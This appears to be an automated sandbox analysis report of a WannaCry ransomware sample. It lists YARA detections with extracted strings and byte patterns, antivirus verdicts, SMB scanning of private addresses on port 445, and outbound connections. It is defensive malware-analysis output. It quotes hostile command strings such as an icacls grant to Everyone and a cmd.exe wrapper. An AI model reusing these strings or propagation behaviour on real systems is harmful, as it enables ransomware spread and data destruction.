F1 23 C1
1.2.onq54JS79W.exe.1eb4104.3.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.1eb4104.3.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x2dcfc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x2dd24:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.23d6948.6.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x2dd20:$x1: icacls . /grant Everyone:F /T /C /Q 0x1daec:$x3: tasksche.exe 0x2dcfc:$x3: tasksche.exe 0x2dcd8:$x4: Global\MsWinZonesCacheCounterMutexA 0x2dd50:$x5: WNcry@2ol7 0x76d0:$x7: mssecsvc.exe 0x1dac4:$x8: C:\%s\qeriuwjhrf 0x2dd20:$x9: icacls . /grant Everyone:F /T /C /Q 0x76b8:$s1: C:\%s\%s 0x1dad8:$s1: C:\%s\%s 0x2dc50:$s3: cmd.exe /c "%s" 0x601a4:$s4: msg/m_portuguese.wnry 0x1ae0c:$s5: \\192.168.56.20\IPC$ 0xb601:$s6: \\172.16.99.5\IPC$ 0x21226:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x20f00:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x20aec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.23d6948.6.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.23d6948.6.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x2dcfc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x2dd24:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.1eb00a4.4.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.onq54JS79W.exe.1eb00a4.4.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x36580:$x1: icacls . /grant Everyone:F /T /C /Q 0x2634c:$x3: tasksche.exe 0x3655c:$x3: tasksche.exe 0x36538:$x4: Global\MsWinZonesCacheCounterMutexA 0x365b0:$x5: WNcry@2ol7 0xc330:$x7: mssecsvc.exe 0x26324:$x8: C:\%s\qeriuwjhrf 0x36580:$x9: icacls . /grant Everyone:F /T /C /Q 0xc318:$s1: C:\%s\%s 0x26338:$s1: C:\%s\%s 0x364b0:$s3: cmd.exe /c "%s" 0x68a04:$s4: msg/m_portuguese.wnry 0x2366c:$s5: \\192.168.56.20\IPC$ 0x10a61:$s6: \\172.16.99.5\IPC$ 0x29a86:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x29760:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x2934c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.1eb00a4.4.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.1eb00a4.4.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x3655c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x36584:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Click to see the 108 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: onq54JS79W.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: onq54JS79W.exe	ReversingLabs: Detection: 97%
Source: onq54JS79W.exe	Virustotal: Detection: 91%			Perma Link

Antivirus detection for dropped file

Source: C:\Windows\tasksche.exe

Avira: detection malicious, Label: TR/AD.WannaCry.sewvt

Multi AV Scanner detection for dropped file

Source: C:\Windows\tasksche.exe	ReversingLabs: Detection: 97%
Source: C:\Windows\tasksche.exe	Virustotal: Detection: 91%			Perma Link

Machine Learning detection for dropped file

Source: C:\Windows\tasksche.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: onq54JS79W.exe

Joe Sandbox ML: detected

Source: 2.2.tasksche.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack	Avira: Label: TR/Ransom.Gen
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack	Avira: Label: TR/Ransom.Gen
Source: 1.2.onq54JS79W.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.onq54JS79W.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.onq54JS79W.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 2.0.tasksche.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.onq54JS79W.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt

Source: C:\Windows\tasksche.exe

Code function: 2_2_004018B9 CryptReleaseContext,

2_2_004018B9

Exploits

Connects to many different private IPs (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.39:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.38:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.42:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.41:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.44:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.43:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.46:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.45:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.48:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.47:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.40:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.28:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.27:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.29:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.31:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.30:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.33:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.32:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.35:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.34:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.37:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.36:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.17:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.16:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.19:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.18:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.20:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.22:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.21:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.24:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.23:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.26:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.25:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.97:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.96:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.11:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.99:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.10:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.98:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.13:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.12:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.15:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.14:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.91:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.90:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.93:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.92:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.95:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.94:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.8:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.7:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.9:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.4:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.3:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.6:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.5:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.86:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.104:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.85:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.105:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.88:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.102:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.87:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.103:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.108:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.89:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.109:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.106:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.107:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.80:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.82:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.100:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.81:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.101:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.84:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.83:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.75:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.115:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.74:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.116:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.77:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.113:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.76:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.114:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.79:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.119:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.78:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.117:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.118:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.71:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.111:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.70:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.112:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.73:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.72:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.110:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.64:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.63:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.66:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.65:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.68:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.67:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.69:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.60:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.62:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.61:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.49:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.53:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.52:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.55:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.54:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.57:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.56:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.59:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.58:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.51:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.50:445	Jump to behavior

Connects to many different private IPs via SMB (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.39:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.38:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.42:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.41:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.44:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.43:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.46:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.45:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.48:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.47:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.40:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.28:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.27:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.29:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.31:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.30:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.33:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.32:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.35:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.34:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.37:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.36:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.17:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.16:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.19:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.18:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.20:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.22:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.21:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.24:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.23:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.26:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.25:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.97:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.96:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.11:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.99:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.10:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.98:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.13:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.12:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.15:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.14:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.91:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.90:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.93:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.92:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.95:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.94:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.8:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.7:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.9:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.4:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.3:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.6:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.5:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.86:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.104:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.85:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.105:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.88:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.102:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.87:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.103:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.108:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.89:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.109:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.106:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.107:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.80:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.82:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.100:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.81:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.101:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.84:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.83:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.75:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.115:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.74:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.116:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.77:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.113:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.76:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.114:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.79:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.119:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.78:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.117:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.118:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.71:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.111:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.70:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.112:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.73:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.72:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.110:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.64:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.63:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.66:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.65:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.68:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.67:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.69:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.60:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.62:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.61:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.49:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.53:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.52:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.55:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.54:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.57:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.56:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.59:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.58:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.51:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.50:445	Jump to behavior

Source: onq54JS79W.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

Network traffic detected: IP country count 21

Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.122
Source: unknown	TCP traffic detected without corresponding DNS query: 72.16.8.158
Source: unknown	TCP traffic detected without corresponding DNS query: 184.113.58.151
Source: unknown	TCP traffic detected without corresponding DNS query: 209.83.253.136
Source: unknown	TCP traffic detected without corresponding DNS query: 101.179.29.185
Source: unknown	TCP traffic detected without corresponding DNS query: 186.166.12.19
Source: unknown	TCP traffic detected without corresponding DNS query: 33.90.140.130
Source: unknown	TCP traffic detected without corresponding DNS query: 188.83.0.169
Source: unknown	TCP traffic detected without corresponding DNS query: 122.132.99.87
Source: unknown	TCP traffic detected without corresponding DNS query: 92.235.114.0
Source: unknown	TCP traffic detected without corresponding DNS query: 157.103.70.155
Source: unknown	TCP traffic detected without corresponding DNS query: 73.246.184.154
Source: unknown	TCP traffic detected without corresponding DNS query: 86.32.234.196
Source: unknown	TCP traffic detected without corresponding DNS query: 39.172.248.169
Source: unknown	TCP traffic detected without corresponding DNS query: 49.41.182.49
Source: unknown	TCP traffic detected without corresponding DNS query: 38.137.250.147
Source: unknown	TCP traffic detected without corresponding DNS query: 214.99.26.73
Source: unknown	TCP traffic detected without corresponding DNS query: 69.159.246.37
Source: unknown	TCP traffic detected without corresponding DNS query: 30.119.92.219
Source: unknown	TCP traffic detected without corresponding DNS query: 47.12.84.116
Source: unknown	TCP traffic detected without corresponding DNS query: 92.220.201.189
Source: unknown	TCP traffic detected without corresponding DNS query: 97.192.118.14
Source: unknown	TCP traffic detected without corresponding DNS query: 29.196.8.189
Source: unknown	TCP traffic detected without corresponding DNS query: 111.0.120.250
Source: unknown	TCP traffic detected without corresponding DNS query: 7.68.74.142
Source: unknown	TCP traffic detected without corresponding DNS query: 22.9.249.138
Source: unknown	TCP traffic detected without corresponding DNS query: 176.181.196.5
Source: unknown	TCP traffic detected without corresponding DNS query: 89.192.116.13
Source: unknown	TCP traffic detected without corresponding DNS query: 56.230.30.41
Source: unknown	TCP traffic detected without corresponding DNS query: 21.128.229.2

Source: onq54JS79W.exe, 00000000.00000002.319894146.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Detected Wannacry Ransomware

Source: C:\Windows\tasksche.exe

Code function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!

2_2_004014A6

Yara detected Wannacry ransomware

Source: Yara match	File source: onq54JS79W.exe, type: SAMPLE
Source: Yara match	File source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.23d28e8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
